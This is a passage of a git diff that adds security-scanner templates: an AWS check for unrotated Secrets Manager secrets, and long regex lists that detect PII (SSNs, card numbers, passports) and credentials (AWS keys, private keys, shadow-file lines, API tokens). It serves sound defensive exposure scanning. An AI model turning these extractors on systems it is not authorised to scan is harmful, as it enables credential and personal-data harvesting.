rotation in AWS by configuring AWS Secrets Manager with a defined rotation interval (e.g., every 30 days) and using Lambda functions to automate the rotation process, ensuring credentials are regularly updated and secure. + reference: + - https://www.trendmicro.com/cloudoneconformity-staging/knowledge-base/aws/SecretsManager/rotation-interval.html + - https://docs.aws.amazon.com/cli/latest/reference/secretsmanager/rotate-secret.html + tags: cloud,devops,aws,amazon,secret-manager,aws-cloud-config + +variables: + region: "us-west-2" + +flow: | + code(1) + for(let SecretListName of iterate(template.secrets)){ + set("secretlist", SecretListName) + code(2) + } + +self-contained: true + +code: + - engine: + - sh + - bash + source: | + aws secretsmanager list-secrets --region $region --query 'SecretList[*].Name' --output json + + extractors: + - type: json + name: secrets + internal: true + json: + - '.[]' + + - engine: + - sh + - bash + source: | + aws secretsmanager describe-secret --region $region --secret-id $secretlist --query 'RotationRules.AutomaticallyAfterDays' + + matchers: + - type: word + words: + - "false" + + extractors: + - type: dsl + dsl: + - '"Secret Rotation Interval " + secretlist + " is not defined"' \ No newline at end of file diff --git a/poc/auth/secrets-patterns-pii.yaml b/poc/auth/secrets-patterns-pii.yaml new file mode 100644 index 0000000000..c13ac3445a --- /dev/null +++ b/poc/auth/secrets-patterns-pii.yaml @@ -0,0 +1,812 @@ +id: secrets-patterns-pii + +info: + name: Secrets Patterns (PII) + author: dwisiswant0 + reference: + - https://github.com/mazen160/secrets-patterns-db # db/pii-stable.yml (3f9f67a8f2b6e140a50a226041e9593fc2f5637e) + severity: info + tags: global-matchers,exposure,token,key,api,secret,password,generic + +http: + - global-matchers: true + extractors: + - type: regex + name: times + regex: + - \d{1,2}:\d{2} ?(?:[ap]\.?m\.?)?|\d[ap]\.?m\.? + part: body + - type: regex + name: phones + regex: + - >- + ((?:(?- + ((?:(?:\+?1\s*(?:[.-]\s*)?)?(?:\(\s*(?:[2-9]1[02-9]|[2-9][02-8]1|[2-9][02-8][02-9])\s*\)|(?:[2-9]1[02-9]|[2-9][02-8]1|[2-9][02-8][02-9]))\s*(?:[.-]\s*)?)?(?:[2-9]1[02-9]|[2-9][02-9]1|[2-9][02-9]{2})\s*(?:[.-]\s*)?(?:[0-9]{4})(?:\s*(?:#|x\.?|ext\.?|extension)\s*(?:\d+)?)) + part: body + - type: regex + name: emails + regex: + - >- + ([a-z0-9!#$%&'*+\/=?^_`{|.}~-]+@(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?) + part: body + - type: regex + name: street_addresses + regex: + - >- + \d{1,4} + [\w\s]{1,20}(?:street|st|avenue|ave|road|rd|highway|hwy|square|sq|trail|trl|drive|dr|court|ct|park|parkway|pkwy|circle|cir|boulevard|blvd)\W?(?=\s|$) + part: body + - type: regex + name: po_boxes + regex: + - P\.? ?O\.? Box \d+ + part: body + - type: regex + name: ukphones + regex: + - >- + ^\s*\(?(020[7,8]{1}\)?[ ]?[1-9]{1}[0-9{2}[ + ]?[0-9]{4})|(0[1-8]{1}[0-9]{3}\)?[]?[1-9]{1}[0-9]{2}[ + ]?[0-9]{3})\s*$ + part: body + - type: regex + name: email_3 + regex: + - \b[\w\-+.]+@+\w+.+[A-z]{3} + part: body + - type: regex + name: ssn_3 + regex: + - "\b(?!000|666)[0-8][0-9]{2}-(?!00)[0-9]{2}-(?!0000)[0-9]{4}\b" + part: body + - type: regex + name: ssn_number + regex: + - >- + (?!000|666|333)0*(?:[0-6][0-9][0-9]|[0-7][0-6][0-9]|[0-7][0-7][0-2])[-](?!00)[0-9]{2}[- + ](?!0000)[0-9]{4} + part: body + - type: regex + name: visa_credit_card + regex: + - 4[0-9]{15} + part: body + - type: regex + name: american_express_creditcard + regex: + - 3[47][0-9]{13} + part: body + - type: regex + name: otp + regex: + - ^[0-9]{6}$ + part: body + - type: regex + name: credit_card_2 + regex: + - >- + 4[0-9]{12}(?:[0-9]{3})?|(?:5[1-5][0-9]{2}|222[1-9]|22[3-9][0-9]|2[3-6][0-9]{2}|27[01][0-9]|2720)[0-9]{12} + |3[47][0-9]{13}|3(?:0[0-5]|[68][0-9])[0-9]{11}|6(?:011|5[0-9]{2})[0-9]{12}|(?:2131|1800|35\d{3})\d{11} + part: body + - type: regex + name: uk_phone_numbers + regex: + - \b([0O]?[1lI][1lI])?[4A][4A][\dOIlZEASB]{10,11}\b + part: body + - type: regex + name: us_phone_numbers + regex: + - >- + \b((\+|\b)[1l][\-\. ])?\(?\b[\dOlZSB]{3,5}([\-\. ]|\) + ?)[\dOlZSB]{3}[\-\. ][\dOlZSB]{4}\b + part: body + - type: regex + name: email_addresses + regex: + - \b[a-z0-9._%\+\-—|]+@[a-z0-9.\-—|]+\.[a-z|]{2,6}\b + part: body + - type: regex + name: credit_card_3 + regex: + - >- + \b((4\d{3}|5[1-5]\d{2}|2\d{3}|3[47]\d{1,2})[\s\-]?\d{4,6}[\s\-]?\d{4,6}?([\s\-]\d{3,4})?(\d{3})?)\b + part: body + - type: regex + name: amex_card + regex: + - \b3[47][0-9]{13}\b + part: body + - type: regex + name: bcglobal + regex: + - \b(6541|6556)[0-9]{12}\b + part: body + - type: regex + name: carte_blanche_card + regex: + - \b389[0-9]{11}\b + part: body + - type: regex + name: diners_club_card + regex: + - \b3(?:0[0-5]|[68][0-9])[0-9]{11}\b + part: body + - type: regex + name: discover_card + regex: + - >- + \b65[4-9][0-9]{13}|64[4-9][0-9]{13}|6011[0-9]{12}|(622(?:12[6-9]|1[3-9][0-9]|[2-8][0-9][0-9]|9[01][0-9]|92[0-5])[0-9]{10})\b + part: body + - type: regex + name: insta_payment_card + regex: + - \b63[7-9][0-9]{13}\b + part: body + - type: regex + name: jcb_card + regex: + - \b(?:2131|1800|35\d{3})\d{11}\b + part: body + - type: regex + name: korean_local_card + regex: + - \b9[0-9]{15}\b + part: body + - type: regex + name: laser_card + regex: + - \b(6304|6706|6709|6771)[0-9]{12,15}\b + part: body + - type: regex + name: maestro_card + regex: + - \b(5018|5020|5038|6304|6759|6761|6763)[0-9]{8,15}\b + part: body + - type: regex + name: mastercard + regex: + - >- + \b(?:4[0-9]{12}(?:[0-9]{3})?|[25][1-7][0-9]{14}|6(?:011|5[0-9][0-9])[0-9]{12}|3[47][0-9]{13}|3(?:0[0-5]|[68][0-9])[0-9]{11}|(?:2131|1800|35\d{3})\d{11})\b + part: body + - type: regex + name: solo_card + regex: + - \b(6334|6767)[0-9]{12}|(6334|6767)[0-9]{14}|(6334|6767)[0-9]{15}\b + part: body + - type: regex + name: switch_card + regex: + - >- + \b(4903|4905|4911|4936|6333|6759)[0-9]{12}|(4903|4905|4911|4936|6333|6759)[0-9]{14}|(4903|4905|4911|4936|6333|6759)[0-9]{15}|564182[0-9]{10}|564182[0-9] + part: body + - type: regex + name: argentina_national_identity_dni_number + regex: + - \d{2}\.\d{3}\.\d{3} + part: body + - type: regex + name: canada_passport_id + regex: + - \b[\w]{2}[\d]{6}\b + part: body + - type: regex + name: croatia_vat_id_card_number + regex: + - \bHR\d{11}\b + part: body + - type: regex + name: czech_republic_vat_id_card_number + regex: + - \bCZ\d{8,10}\b + part: body + - type: regex + name: denmark_personal_id_number + regex: + - \b\d{10}|\d{6}[-\s]\d{4}\b + part: body + - type: regex + name: france_national_id_card_cni + regex: + - \b\d{12}\b + part: body + - type: regex + name: france_social_security_number_insee + regex: + - \b\d{13}|\d{13}\s\d{2}\b + part: body + - type: regex + name: france_passport_id + regex: + - \b\d{2}11\d{5}\b + part: body + - type: regex + name: germany_id_card_number + regex: + - \bl\d{8}\b + part: body + - type: regex + name: germany_passport_id + regex: + - \b[cfghjk]\d{3}\w{5}\d\b + part: body + - type: regex + name: germany_drivers_license_id + regex: + - \b[\d\w]\d{2}[\d\w]{6}\d[\d\w]\b + part: body + - type: regex + name: ireland_personal_public_service_pps_number + regex: + - \b\d{7}\w{1,2}\b + part: body + - type: regex + name: netherlands_citizens_service_bsn_number + regex: + - \b\d{8}|\d{3}[-\.\s]\d{3}[-\.\s]\d{3}\b + part: body + - type: regex + name: poland_national_id_pesel + regex: + - \b\d{11}\b + part: body + - type: regex + name: portugal_citizen_card_number + regex: + - \d{9}[\w\d]{2}|\d{8}-\d[\d\w]{2}\d + part: body + - type: regex + name: spain_social_security_number_ssn + regex: + - \b\d{2}\/?\d{8}\/?\d{2}\b + part: body + - type: regex + name: spain_social_security_number_ssn_2 + regex: + - \b\d{3}[ -.]\d{2}[ -.]\d{4}\b` + part: body + - type: regex + name: sweden_passport_id + regex: + - \b\d{8}\b + part: body + - type: regex + name: united_kingdom_passport_id + regex: + - \b\d{9}\b + part: body + - type: regex + name: united_kingdom_drivers_license_id + regex: + - \b[\w9]{5}\d{6}[\w9]{2}\d{5}\b + part: body + - type: regex + name: united_kingdom_national_health_service_nhs_number + regex: + - \b\d{3}\s\d{3}\s\d{4}\b + part: body + - type: regex + name: ipv4 + regex: + - >- + (?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?) + part: body + - type: regex + name: prices + regex: + - '[$]\s?[+-]?[0-9]{1,3}(?:(?:,?[0-9]{3}))*(?:\.[0-9]{1,2})?' + part: body + - type: regex + name: hex_colors + regex: + - (#(?:[0-9a-fA-F]{8})|#(?:[0-9a-fA-F]{3}){1,2})\b + part: body + - type: regex + name: credit_cards + regex: + - ((?:(?:\d{4}[- ]?){3}\d{4}|\d{15,16}))(?![\d]) + part: body + - type: regex + name: visa_cards + regex: + - 4\d{3}[\s-]?\d{4}[\s-]?\d{4}[\s-]?\d{4} + part: body + - type: regex + name: master_cards + regex: + - 5[1-5]\d{2}[\s-]?\d{4}[\s-]?\d{4}[\s-]?\d{4} + part: body + - type: regex + name: btc_addresses + regex: + - >- + (?- + ((git|ssh|http(s)?)|(git@[\w\.]+))(:(\/\/)?)([\w\.@\:/\-~]+)(\.git)(\/)? + part: body + - type: regex + name: drivers_license_number_simplified + regex: + - ^[A-Z]{2}-\d{6}$ + part: body + - type: regex + name: passport_number_simplified_3 + regex: + - ^[A-Z]\d{7}$ + part: body + - type: regex + name: social_security_number_ssn_3 + regex: + - ^\d{3}-\d{2}-\d{4}$ + part: body + - type: regex + name: social_security_number_ssn_4 + regex: + - (?:\\b\\d{3}-?\\d{2}-?(\\d{4})\\b) + part: body + - type: regex + name: date_of_birth + regex: + - ^\d{2}/\d{2}/\d{4}$|^\d{4}-\d{2}-\d{2}$ + part: body + - type: regex + name: arista_network_configuration + regex: + - via\ \d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3},\ \d{2}:\d{2}:\d{2} + part: body + - type: regex + name: bbva_compass_routing_number_california + regex: + - ^321170538$ + part: body + - type: regex + name: bank_of_america_routing_numbers_california + regex: + - ^(?:121|026)00(?:0|9)(?:358|593)$ + part: body + - type: regex + name: box_links + regex: + - https://app.box.com/[s|l]/\S+ + part: body + - type: regex + name: cve_number + regex: + - CVE-\d{4}-\d{4,7} + part: body + - type: regex + name: california_drivers_license + regex: + - ^[A-Z]{1}\d{7}$ + part: body + - type: regex + name: chase_routing_numbers_california + regex: + - ^322271627$ + part: body + - type: regex + name: cisco_router_config + regex: + - >- + service\ timestamps\ [a-z]{3,5}\ datetime\ + msec|boot-[a-z]{3,5}-marker|interface\ [A-Za-z0-9]{0,10}[E,e]thernet + part: body + - type: regex + name: citibank_routing_numbers_california + regex: + - ^32(?:11|22)71(?:18|72)4$ + part: body + - type: regex + name: dsa_private_key + regex: + - >- + -----BEGIN DSA PRIVATE KEY-----(?:[a-zA-Z0-9\+\=\/"']|\s)+?-----END + DSA PRIVATE KEY----- + part: body + - type: regex + name: dropbox_links + regex: + - https://www.dropbox.com/(?:s|l)/\S+ + part: body + - type: regex + name: ec_private_key + regex: + - >- + -----BEGIN (?:EC|ECDSA) PRIVATE + KEY-----(?:[a-zA-Z0-9\+\=\/"']|\s)+?-----END (?:EC|ECDSA) PRIVATE + KEY----- + part: body + - type: regex + name: encrypted_dsa_private_key + regex: + - >- + -----BEGIN DSA PRIVATE KEY-----\s.*,ENCRYPTED(?:.|\s)+?-----END DSA + PRIVATE KEY----- + part: body + - type: regex + name: encrypted_ec_private_key + regex: + - >- + -----BEGIN (?:EC|ECDSA) PRIVATE + KEY-----\s.*,ENCRYPTED(?:.|\s)+?-----END (?:EC|ECDSA) PRIVATE + KEY----- + part: body + - type: regex + name: encrypted_private_key + regex: + - >- + -----BEGIN ENCRYPTED PRIVATE KEY-----(?:.|\s)+?-----END ENCRYPTED + PRIVATE KEY----- + part: body + - type: regex + name: encrypted_putty_ssh_dsa_key + regex: + - >- + PuTTY-User-Key-File-2: ssh-dss\s*Encryption: + aes(?:.|\s?)*?Private-MAC: + part: body + - type: regex + name: encrypted_rsa_private_key + regex: + - >- + -----BEGIN RSA PRIVATE KEY-----\s.*,ENCRYPTED(?:.|\s)+?-----END RSA + PRIVATE KEY----- + part: body + - type: regex + name: google_application_identifier + regex: + - '[0-9]+-\w+.apps.googleusercontent.com' + part: body + - type: regex + name: hipaa_phi_national_drug_code + regex: + - ^\d{4,5}-\d{3,4}-\d{1,2}$ + part: body + - type: regex + name: huawei_config_file + regex: + - sysname\ HUAWEI|set\ authentication\ password\ simple\ huawei + part: body + - type: regex + name: individual_taxpayer_identification_numbers_itin + regex: + - ^9\d{2}(?:[ \-]?)[7,8]\d(?:[ \-]?)\d{4}$ + part: body + - type: regex + name: john_the_ripper + regex: + - >- + [J,j]ohn\ [T,t]he\ [R,r]ipper|john-[1-9].[1-9].[1-9]|Many\ + salts:|Only\ one\ + salt:|openwall.com/john/|List.External:[0-9a-zA-Z]*|Loaded\ [0-9]*\ + password hash|guesses:\ \d*\ \ time:\ + \d*:\d{2}:\d{2}:\d{2}|john\.pot + part: body + - type: regex + name: keepass_1x_csv_passwords + regex: + - '"Account","Login Name","Password","Web Site","Comments"' + part: body + - type: regex + name: keepass_1x_xml_passwords + regex: + - >- + \s*?[\S\s]*?[\S\s]*?<\/pwentry>\s*?<\/pwlist> + part: body + - type: regex + name: large_number_of_us_phone_numbers + regex: + - \d{3}-\d{3}-\d{4}|\(\d{3}\)\ ?\d{3}-?\d{4} + part: body + - type: regex + name: large_number_of_us_zip_codes + regex: + - ^(\d{5}-\d{4}|\d{5})$ + part: body + - type: regex + name: lightweight_directory_access_protocol + regex: + - (?:dn|cn|dc|sn):\s*[a-zA-Z0-9=, ]* + part: body + - type: regex + name: metasploit_module + regex: + - >- + require\ 'msf/core'|class\ Metasploit|include\ + Msf::Exploit::\w+::\w+ + part: body + - type: regex + name: mysql_database_dump + regex: + - >- + DROP DATABASE IF EXISTS(?:.|\n){5,300}CREATE + DATABASE(?:.|\n){5,300}DROP TABLE IF EXISTS(?:.|\n){5,300}CREATE + TABLE + part: body + - type: regex + name: mysqlite_database_dump + regex: + - >- + DROP\ TABLE\ IF\ EXISTS\ \[[a-zA-Z]*\];|CREATE\ TABLE\ + \[[a-zA-Z]*\]; + part: body + - type: regex + name: network_proxy_autoconfig + regex: + - proxy\.pac|function\ FindProxyForURL\(\w+,\ \w+\) + part: body + - type: regex + name: nmap_scan_report + regex: + - Nmap\ scan\ report\ for\ [a-zA-Z0-9.]+ + part: body + - type: regex + name: pgp_header + regex: + - '-{5}(?:BEGIN|END)\ PGP\ MESSAGE-{5}' + part: body + - type: regex + name: pgp_private_key_block + regex: + - >- + -----BEGIN PGP PRIVATE KEY BLOCK-----(?:.|\s)+?-----END PGP PRIVATE + KEY BLOCK----- + part: body + - type: regex + name: pkcs7_encrypted_data + regex: + - >- + (?:Signer|Recipient)Info(?:s)?\ ::=\ + \w+|[D|d]igest(?:Encryption)?Algorithm|EncryptedKey\ ::= \w+ + part: body + - type: regex + name: password_etc_passwd + regex: + - >- + [a-zA-Z0-9\-]+:[x|\*]:\d+:\d+:[a-zA-Z0-9/\- + "]*:/[a-zA-Z0-9/\-]*:/[a-zA-Z0-9/\-]+ + part: body + - type: regex + name: password_etc_shadow + regex: + - >- + [a-zA-Z0-9\-]+:(?:(?:!!?)|(?:\*LOCK\*?)|\*|(?:\*LCK\*?)|(?:\$.*\$.*\$.*?)?):\d*:\d*:\d*:\d*:\d*:\d*: + part: body + - type: regex + name: plaintext_private_key + regex: + - '-----BEGIN PRIVATE KEY-----(?:.|\s)+?-----END PRIVATE KEY-----' + part: body + - type: regex + name: putty_ssh_dsa_key + regex: + - >- + PuTTY-User-Key-File-2: ssh-dss\s*Encryption: + none(?:.|\s?)*?Private-MAC: + part: body + - type: regex + name: putty_ssh_rsa_key + regex: + - >- + PuTTY-User-Key-File-2: ssh-rsa\s*Encryption: + none(?:.|\s?)*?Private-MAC: + part: body + - type: regex + name: public_key_cryptography_system_pkcs + regex: + - protocol="application/x-pkcs[0-9]{0,2}-signature" + part: body + - type: regex + name: public_encrypted_key + regex: + - '-----BEGIN PUBLIC KEY-----(?:.|\s)+?-----END PUBLIC KEY-----' + part: body + - type: regex + name: rsa_private_key + regex: + - >- + -----BEGIN RSA PRIVATE KEY-----(?:[a-zA-Z0-9\+\=\/"']|\s)+?-----END + RSA PRIVATE KEY----- + part: body + - type: regex + name: ssl_certificate + regex: + - '-----BEGIN CERTIFICATE-----(?:.|\n)+?\s-----END CERTIFICATE-----' + part: body + - type: regex + name: swift_codes + regex: + - '[A-Za-z]{4}(?:GB|US|DE|RU|CA|JP|CN)[0-9a-zA-Z]{2,5}$' + part: body + - type: regex + name: samba_password_config_file + regex: + - '[a-z]*:\d{3}:[0-9a-zA-Z]*:[0-9a-zA-Z]*:\[U\ \]:.*' + part: body + - type: regex + name: slack_2fa_backup_codes + regex: + - >- + Two-Factor\s*\S*Authentication\s*\S*Backup\s*\S*Codes(?:.|\n)*[Ss]lack(?:.|\n)*\d{9} + part: body + - type: regex + name: uk_drivers_license_numbers + regex: + - '[A-Z]{5}\d{6}[A-Z]{2}\d{1}[A-Z]{2}' + part: body + - type: regex + name: uk_passport_number + regex: + - \d{10}GB[RP]\d{7}[UMF]{1}\d{9} + part: body + - type: regex + name: usbank_routing_numbers_california + regex: + - ^12(?:1122676|2235821)$ + part: body + - type: regex + name: united_bank_routing_number_california + regex: + - ^122243350$ + part: body + - type: regex + name: wells_fargo_routing_numbers_california + regex: + - ^121042882$ + part: body + - type: regex + name: aws_access_key + regex: + - >- + ((access[-_]?key[-_]?id)|(ACCESS[-_]?KEY[-_]?ID)|([Aa]ccessKeyId)|(access[_-]?id)).{0,20}AKIA[a-zA-Z0-9+/]{16}[^a-zA-Z0-9+/] + part: body + - type: regex + name: aws_credentials_context + regex: + - access_key_id|secret_access_key|AssetSync.configure + part: body + - type: regex + name: aws_secret_key + regex: + - >- + ((secret[-_]?access[-_]?key)|(SECRET[-_]?ACCESS[-_]?KEY|(private[-_]?key))|([Ss]ecretAccessKey)).{0,20}[^a-zA-Z0-9+/][a-zA-Z0-9+/]{40}\b + part: body + - type: regex + name: facebook_secret + regex: + - >- + (facebook_secret|FACEBOOK_SECRET|facebook_app_secret|FACEBOOK_APP_SECRET)[a-z_ + =\s"'\:]{0,5}[^a-zA-Z0-9][a-f0-9]{32}[^a-zA-Z0-9] + part: body + - type: regex + name: github_key + regex: + - >- + (GITHUB_SECRET|GITHUB_KEY|github_secret|github_key|github_token|GITHUB_TOKEN|github_api_key|GITHUB_API_KEY)[a-z_ + =\s"'\:]{0,10}[^a-zA-Z0-9][a-zA-Z0-9]{40}[^a-zA-Z0-9] + part: body + - type: regex + name: google_two_factor_backup + regex: + - (?:BACKUP VERIFICATION CODES|SAVE YOUR BACKUP CODES)[\s\S]{0,300}@ + part: body + - type: regex + name: heroku_key + regex: + - >- + (heroku_api_key|HEROKU_API_KEY|heroku_secret|HEROKU_SECRET)[a-z_ + =\s"'\:]{0,10}[^a-zA-Z0-9-]\w{8}(?:-\w{4}){3}-\w{12}[^a-zA-Z0-9\-] + part: body + - type: regex + name: microsoft_office_365_oauth_context + regex: + - >- + https://login.microsoftonline.com/common/oauth2/v2.0/token|https://login.windows.net/common/oauth2/token + part: body + - type: regex + name: pgsql_connection_information + regex: + - (?:postgres|pgsql)\:\/\/ + part: body + - type: regex + name: slack_api_key + regex: + - >- + (slack_api_key|SLACK_API_KEY|slack_key|SLACK_KEY)[a-z_ + =\s"'\:]{0,10}[^a-f0-9][a-f0-9]{32}[^a-f0-9] + part: body + - type: regex + name: slack_api_token + regex: + - (xox[pb](?:-[a-zA-Z0-9]+){4,}) + part: body + - type: regex + name: ssh_dss_public + regex: + - ssh-dss [0-9A-Za-z+/]+[=]{2} + part: body + - type: regex + name: ssh_rsa_public + regex: + - ssh-rsa AAAA[0-9A-Za-z+/]+[=]{0,3} [^@]+@[^@]+ + part: body + - type: regex + name: iban + regex: + - '[a-zA-Z]{2}[0-9]{2}[a-zA-Z0-9]{4}[0-9]{7}([a-zA-Z0-9]?){0,16}' + part: body + - type: regex + name: gps_data + regex: + - >- + ^([-+]?)([\d]{1,2})(((\.)(\d+)(,)))(\s*)(([-+]?)([\d]{1,3})((\.)(\d+))?) + part: body + - type: regex + name: blood_type + regex: + - ^(A|B|AB|O)[-+]$ + part: body + - type: regex + name: date_of_birth_2 + regex: + - >- + ^([1-9]|[12][0-9]|3[01])(\/?\.\-?\-?\s?)(0[1-9]|1[12])(\/?\.?\-?\s?)(19[0-9][0-9]|20[0][0-9]|20[1][0-8])$ + part: body + - type: regex + name: tax_number + regex: + - ^[0-9]{10}$ + part: body + - type: regex + name: bitcoin_address + regex: + - ^[13][a-km-zA-HJ-NP-Z0-9]{26,33}$ + part: body diff --git a/poc/auth/secrets-patterns-rules.yaml b/poc/auth/secrets-patterns-rules.yaml new file mode 100644 index 0000000000..5eb34d9543 --- /dev/null +++ b/poc/auth/secrets-patterns-rules.yaml @@ -0,0 +1,4502 @@ +id: secrets-patterns-rules + +info: + name: Secrets Patterns (Rules) + author: dwisiswant0 + reference: + - https://github.com/mazen160/secrets-patterns-db # db/rules-stable.yml (151eaf659f3bcac3f81161808765eaa91045f2c7) + severity: info + tags: global-matchers,exposure,token,key,api,secret,password,generic + +http: + - global-matchers: true + extractors: + - type: regex + name: aws_api_key + regex: + - AKIA[0-9A-Z]{16} + part: body + - type: regex + name: aws_arn + regex: + - arn:aws:[a-z0-9-]+:[a-z]{2}-[a-z]+-[0-9]+:[0-9]+:.+ + part: body + - type: regex + name: aws_access_key_id_value + regex: + - (A3T[A-Z0-9]|AKIA|AGPA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16} + part: body + - type: regex + name: aws_appsync_graphql_key + regex: + - da2-[a-z0-9]{26} + part: body + - type: regex + name: aws_mws_key + regex: + - >- + amzn\.mws\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12} + part: body + - type: regex + name: aws_rds + regex: + - '[0-9a-z._-]+.rds.amazonaws.com' + part: body + - type: regex + name: aws_s3_bucket + regex: + - s3://[0-9a-z._/-]+ + part: body + - type: regex + name: aws_cred_file_info + regex: + - (aws_access_key_id|aws_secret_access_key) + part: body + - type: regex + name: abbysale + regex: + - (?:abbysale).{0,40}\b([a-z0-9A-Z]{40})\b + part: body + - type: regex + name: abstract + regex: + - (?:abstract).{0,40}\b([0-9a-z]{32})\b + part: body + - type: regex + name: abuseipdb + regex: + - (?:abuseipdb).{0,40}\b([a-z0-9]{80})\b + part: body + - type: regex + name: accuweather + regex: + - (?:accuweather).{0,40}([a-z0-9A-Z\%]{35})\b + part: body + - type: regex + name: adafruitio + regex: + - \b(aio\_[a-zA-Z0-9]{28})\b + part: body + - type: regex + name: adobeio_1 + regex: + - (?:adobe).{0,40}\b([a-z0-9]{32})\b + part: body + - type: regex + name: adzuna_1 + regex: + - (?:adzuna).{0,40}\b([a-z0-9]{8})\b + part: body + - type: regex + name: adzuna_2 + regex: + - (?:adzuna).{0,40}\b([a-z0-9]{32})\b + part: body + - type: regex + name: aeroworkflow_1 + regex: + - (?:aeroworkflow).{0,40}\b([0-9]{1,})\b + part: body + - type: regex + name: aeroworkflow_2 + regex: + - (?:aeroworkflow).{0,40}\b([a-zA-Z0-9^!]{20})\b + part: body + - type: regex + name: agora + regex: + - (?:agora).{0,40}\b([a-z0-9]{32})\b + part: body + - type: regex + name: airbrakeprojectkey_1 + regex: + - (?:airbrake).{0,40}\b([0-9]{6})\b + part: body + - type: regex + name: airbrakeprojectkey_2 + regex: + - (?:airbrake).{0,40}\b([a-zA-Z-0-9]{32})\b + part: body + - type: regex + name: airbrakeuserkey + regex: + - (?:airbrake).{0,40}\b([a-zA-Z-0-9]{40})\b + part: body + - type: regex + name: airship + regex: + - (?:airship).{0,40}\b([0-9Aa-zA-Z]{91})\b + part: body + - type: regex + name: airvisual + regex: + - (?:airvisual).{0,40}\b([a-z0-9-]{36})\b + part: body + - type: regex + name: alconost + regex: + - (?:alconost).{0,40}\b([0-9Aa-z]{32})\b + part: body + - type: regex + name: alegra_1 + regex: + - (?:alegra).{0,40}\b([a-z0-9-]{20})\b + part: body + - type: regex + name: alegra_2 + regex: + - (?:alegra).{0,40}\b([a-zA-Z0-9.-@]{25,30})\b + part: body + - type: regex + name: aletheiaapi + regex: + - (?:aletheiaapi).{0,40}\b([A-Z0-9]{32})\b + part: body + - type: regex + name: alibaba_2 + regex: + - \b(LTAI[a-zA-Z0-9]{17,21})[\"' ;\s]* + part: body + - type: regex + name: alienvault + regex: + - (?:alienvault).{0,40}\b([a-z0-9]{64})\b + part: body + - type: regex + name: allsports + regex: + - (?:allsports).{0,40}\b([0-9a-z]{64})\b + part: body + - type: regex + name: amadeus_1 + regex: + - (?:amadeus).{0,40}\b([0-9A-Za-z]{32})\b + part: body + - type: regex + name: amadeus_2 + regex: + - (?:amadeus).{0,40}\b([0-9A-Za-z]{16})\b + part: body + - type: regex + name: ambee + regex: + - (?:ambee).{0,40}\b([0-9a-f]{64})\b + part: body + - type: regex + name: amplitudeapikey + regex: + - (?:amplitude).{0,40}\b([a-f0-9]{32}) + part: body + - type: regex + name: apacta + regex: + - (?:apacta).{0,40}\b([a-z0-9-]{36})\b + part: body + - type: regex + name: api2cart + regex: + - (?:api2cart).{0,40}\b([0-9a-f]{32})\b + part: body + - type: regex + name: apideck_1 + regex: + - \b(sk_live_[a-z0-9A-Z-]{93})\b + part: body + - type: regex + name: apideck_2 + regex: + - (?:apideck).{0,40}\b([a-z0-9A-Z]{40})\b + part: body + - type: regex + name: apiflash_1 + regex: + - (?:apiflash).{0,40}\b([a-z0-9]{32})\b + part: body + - type: regex + name: apiflash_2 + regex: + - (?:apiflash).{0,40}\b([a-zA-Z0-9\S]{21,30})\b + part: body + - type: regex + name: apifonica + regex: + - >- + (?:apifonica).{0,40}\b([0-9a-z]{11}-[0-9a-z]{4}-[0-9a-z]{4}-[0-9a-z]{4}-[0-9a-z]{12})\b + part: body + - type: regex + name: apify + regex: + - \b(apify\_api\_[a-zA-Z-0-9]{36})\b + part: body + - type: regex + name: apimatic_1 + regex: + - (?:apimatic).{0,40}\b([a-z0-9-\S]{8,32})\b + part: body + - type: regex + name: apimatic_2 + regex: + - >- + (?:apimatic).{0,40}\b([a-zA-Z0-9]{3,20}@[a-zA-Z0-9]{2,12}.[a-zA-Z0-9]{2,5})\b + part: body + - type: regex + name: apiscience + regex: + - (?:apiscience).{0,40}\b([a-bA-Z0-9\S]{22})\b + part: body + - type: regex + name: apollo + regex: + - (?:apollo).{0,40}\b([a-zA-Z0-9]{22})\b + part: body + - type: regex + name: appcues_1 + regex: + - (?:appcues).{0,40}\b([0-9]{5})\b + part: body + - type: regex + name: appcues_2 + regex: + - (?:appcues).{0,40}\b([a-z0-9-]{36})\b + part: body + - type: regex + name: appcues_3 + regex: + - (?:appcues).{0,40}\b([a-z0-9-]{39})\b + part: body + - type: regex + name: appfollow + regex: + - (?:appfollow).{0,40}\b([0-9A-Za-z]{20})\b + part: body + - type: regex + name: appsynergy + regex: + - (?:appsynergy).{0,40}\b([a-z0-9]{64})\b + part: body + - type: regex + name: apptivo_1 + regex: + - (?:apptivo).{0,40}\b([a-z0-9-]{36})\b + part: body + - type: regex + name: apptivo_2 + regex: + - (?:apptivo).{0,40}\b([a-zA-Z0-9-]{32})\b + part: body + - type: regex + name: artifactory_2 + regex: + - \b([A-Za-z0-9](?:[A-Za-z0-9\-]{0,61}[A-Za-z0-9])\.jfrog\.io) + part: body + - type: regex + name: artsy_1 + regex: + - (?:artsy).{0,40}\b([0-9a-zA-Z]{20})\b + part: body + - type: regex + name: artsy_2 + regex: + - (?:artsy).{0,40}\b([0-9a-zA-Z]{32})\b + part: body + - type: regex + name: asanaoauth + regex: + - (?:asana).{0,40}\b([a-z\/:0-9]{51})\b + part: body + - type: regex + name: asanapersonalaccesstoken + regex: + - (?:asana).{0,40}\b([0-9]{1,}\/[0-9]{16,}:[A-Za-z0-9]{32,})\b + part: body + - type: regex + name: assemblyai + regex: + - (?:assemblyai).{0,40}\b([0-9a-z]{32})\b + part: body + - type: regex + name: asymmetric_private_key + regex: + - '-----BEGIN ((EC|PGP|DSA|RSA|OPENSSH) )?PRIVATE KEY( BLOCK)?-----' + part: body + - type: regex + name: audd + regex: + - (?:audd).{0,40}\b([a-z0-9-]{32})\b + part: body + - type: regex + name: auth0managementapitoken + regex: + - (?:auth0).{0,40}\b(ey[a-zA-Z0-9._-]+)\b + part: body + - type: regex + name: autodesk_1 + regex: + - (?:autodesk).{0,40}\b([0-9A-Za-z]{32})\b + part: body + - type: regex + name: autodesk_2 + regex: + - (?:autodesk).{0,40}\b([0-9A-Za-z]{16})\b + part: body + - type: regex + 